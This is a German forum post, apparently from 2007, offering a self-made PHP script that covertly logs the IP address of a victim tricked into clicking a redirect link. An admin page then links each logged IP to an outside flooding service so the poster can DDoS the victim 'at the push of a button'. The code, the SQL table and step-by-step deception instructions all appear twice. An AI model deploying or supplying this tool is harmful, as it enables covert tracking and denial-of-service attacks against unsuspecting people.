Floo
09.09.2007, 12:47
Nach meinem MSN-Freezerscript veröffentliche ich nun auch ein selbstgebasteltes Script, mitdem ihr an IPs kommt, ohne, dass das Opfer etwas davon erfährt und ihr danach das Vic ddosen könnt auf Knopfdruck.
Vorraussetzung:
- 4 KB Webspace
- 1 SQL-Datenbank
<?php
$database_name = ''; // DB-Name
$db_host = ''; // Host
$db_username = ''; // Username
$db_password = ''; // Passwort
function db_query($q)
{
global $_query_cnt;
$r = mysql_query($q);
$_query_cnt++;
if(mysql_error() != '')
{
die('<tt>'.$q.'</tt>
caused an error:
'.mysql_error());
}
return $r;
}
function dbname($srvid = -1)
{
global $database_prefix, $database_suffix, $enable_multi_server_support, $database_name;
if( $enable_multi_server_support )
{
return $database_prefix . $srvid . $database_suffix;
}
else
{
return $database_name;
}
}
function db_select($name)
{
$r = mysql_select_db($name);
if(mysql_error() != '' || $r == false)
{
die('Fehler beim Auswaehlen der DB:
'.mysql_error());
}
return $r;
}
@mysql_connect($db_host, $db_username, $db_password);
@mysql_select_db($database_name);
if($_GET['m']!="admin"){
db_query('INSERT INTO ip SET ip = \''.$_SERVER['REMOTE_ADDR'].'\' , time=\''.time().'\'');
header('Location:'.$_GET['target'].'');
}
if($_GET['m']=="admin"){
$a = db_query('SELECT * FROM ip');
while($b=mysql_fetch_assoc($a)){
echo'
'.$b['ip'].' (http://now-webmedia.net/src/func/user_scr.php?target='.$b['ip'].') um '.date("d.m.y G:i", $b['time']).'';
}
}
?>
So gehts:
1. Datenbank erstellen und Zugangsdaten einsetzen (siehe fettdruck)
2. Dem Vic den link www.deinhost.de/script.php?target=URLADRESSE unterjubeln.
Statt URLADRESSE eine Homepageadresse (mit http://www.) wählen.
3. Das Vic geht auf den Link und kommt ganz normal auf die URLADRESSE, die ihr angegeben habt
4. Ihr selber geht auf www.deinhost.de/script.php?m=admin
5. Ihr wählt die IP-Adresse vom Vic (Zeitangabe ist dabei) und klickt auf die IP-Adresse drauf
6. Das Vic wird geflooded
Und für die SQL-Tabelle:
CREATE TABLE `ip` (
`ip` varchar(20) NOT NULL,
`time` varchar(20) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
Fragen bitte untendrunter.
Demo: http://floo.myconfixx.info/ip.php
Vorraussetzung:
- 4 KB Webspace
- 1 SQL-Datenbank
<?php
$database_name = ''; // DB-Name
$db_host = ''; // Host
$db_username = ''; // Username
$db_password = ''; // Passwort
function db_query($q)
{
global $_query_cnt;
$r = mysql_query($q);
$_query_cnt++;
if(mysql_error() != '')
{
die('<tt>'.$q.'</tt>
caused an error:
'.mysql_error());
}
return $r;
}
function dbname($srvid = -1)
{
global $database_prefix, $database_suffix, $enable_multi_server_support, $database_name;
if( $enable_multi_server_support )
{
return $database_prefix . $srvid . $database_suffix;
}
else
{
return $database_name;
}
}
function db_select($name)
{
$r = mysql_select_db($name);
if(mysql_error() != '' || $r == false)
{
die('Fehler beim Auswaehlen der DB:
'.mysql_error());
}
return $r;
}
@mysql_connect($db_host, $db_username, $db_password);
@mysql_select_db($database_name);
if($_GET['m']!="admin"){
db_query('INSERT INTO ip SET ip = \''.$_SERVER['REMOTE_ADDR'].'\' , time=\''.time().'\'');
header('Location:'.$_GET['target'].'');
}
if($_GET['m']=="admin"){
$a = db_query('SELECT * FROM ip');
while($b=mysql_fetch_assoc($a)){
echo'
'.$b['ip'].' (http://now-webmedia.net/src/func/user_scr.php?target='.$b['ip'].') um '.date("d.m.y G:i", $b['time']).'';
}
}
?>
So gehts:
1. Datenbank erstellen und Zugangsdaten einsetzen (siehe fettdruck)
2. Dem Vic den link www.deinhost.de/script.php?target=URLADRESSE unterjubeln.
Statt URLADRESSE eine Homepageadresse (mit http://www.) wählen.
3. Das Vic geht auf den Link und kommt ganz normal auf die URLADRESSE, die ihr angegeben habt
4. Ihr selber geht auf www.deinhost.de/script.php?m=admin
5. Ihr wählt die IP-Adresse vom Vic (Zeitangabe ist dabei) und klickt auf die IP-Adresse drauf
6. Das Vic wird geflooded
Und für die SQL-Tabelle:
CREATE TABLE `ip` (
`ip` varchar(20) NOT NULL,
`time` varchar(20) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
Fragen bitte untendrunter.
Demo: http://floo.myconfixx.info/ip.php